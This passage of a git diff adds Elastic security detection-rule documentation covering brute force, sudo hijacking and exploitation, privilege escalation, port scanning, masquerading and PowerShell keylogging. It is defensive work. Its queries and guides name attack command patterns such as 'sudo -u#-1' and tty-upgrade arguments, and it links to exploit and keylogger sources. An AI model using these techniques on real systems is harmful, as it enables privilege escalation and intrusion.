Attack Detected + +An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, related.user with maxspan=5s + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal : "*rdp*" and event.outcome == "failure"] with runs=10 + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal : "*rdp*" and event.outcome == "success"] | tail 1 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc new file mode 100644 index 0000000000..0d5615c2be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc @@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack]] +=== Potential Successful SSH Brute Force Attack + +Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-system.auth-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Successful SSH Brute Force Attack + +The rule identifies consecutive SSH login failures followed by a successful login from the same source IP address to the same target host indicating a successful attempt of brute force password guessing. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Ensure active session(s) on the host(s) are terminated as the attacker could have gained initial access to the system(s). +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and + event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10 + + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and + event.outcome == "success" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc new file mode 100644 index 0000000000..daa20c768b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-sudo-hijacking-detected]] +=== Potential Sudo Hijacking Detected + +Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://eapolsniper.github.io/2020/08/17/Sudo-Hijacking/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 103 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.type:("creation" or "file_create_event") and +file.path:("/usr/bin/sudo" or "/bin/sudo") and not process.name:(docker or dockerd) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc new file mode 100644 index 0000000000..a869fb2fa5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc @@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287]] +=== Potential Sudo Privilege Escalation via CVE-2019-14287 + +This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/exploits/47502 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Use Case: Vulnerability + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "sudo" and process.args == "-u#-1" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc new file mode 100644 index 0000000000..7f922fb36c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection]] +=== Potential Sudo Token Manipulation via Process Injection + +This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/nongiach/sudo_inject + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.session_leader.entity_id with maxspan=15s +[ process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "gdb" and process.user.id != "0" and process.group.id != "0" ] +[ process where host.os.type == "linux" and event.action == "uid_change" and event.type == "change" and + process.name == "sudo" and process.user.id == "0" and process.group.id == "0" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Ptrace System Calls +** ID: T1055.008 +** Reference URL: https://attack.mitre.org/techniques/T1055/008/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc new file mode 100644 index 0000000000..7a695dd23b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access]] +=== Potential Suspicious DebugFS Root Device Access + +This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#disk-group + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name == "debugfs" and process.args : "/dev/sd*" and not process.args == "-R" and +not user.Ext.real.id == "0" and not group.Ext.real.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc new file mode 100644 index 0000000000..a522b8e4d3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc @@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected]] +=== Potential SYN-Based Network Scan Detected + +This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-network_traffic.* +* packetbeat-* +* auditbeat-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc new file mode 100644 index 0000000000..d9f3edc572 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected]] +=== Potential Unauthorized Access via Wildcard Injection Detected + +This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/papers/33930 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ("chown", "chmod") and process.args == "-R" and process.args : "--reference=*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc new file mode 100644 index 0000000000..3495229b03 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell]] +=== Potential Upgrade of Non-interactive Shell + +Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( + (process.name == "stty" and process.args == "raw" and process.args == "-echo" and process.args_count >= 3) or + (process.name == "script" and process.args in ("-qc", "-c") and process.args == "/dev/null" and + process.args_count == 4) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc new file mode 100644 index 0000000000..772e113d90 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading]] +=== Potential Windows Error Manager Masquerading + +Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/SBousseaden/status/1235533224337641473 +* https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/ +* https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Windows Error Manager Masquerading + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation. + +This rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan = 5s + [process where host.os.type == "windows" and event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1] + [network where host.os.type == "windows" and process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and destination.ip !="::1" and destination.ip !="127.0.0.1" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc new file mode 100644 index 0000000000..c0ae22def6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-powershell-keylogging-script]] +=== PowerShell Keylogging Script + +Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1 +* https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Keylogging Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other valuable information as credit card data and confidential conversations. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Determine whether the script stores the captured data locally. +- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server. +- Assess network data to determine if the host communicated with the exfiltration server. + +### False positive analysis + +- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Related rules + +- PowerShell PSReflect Script - 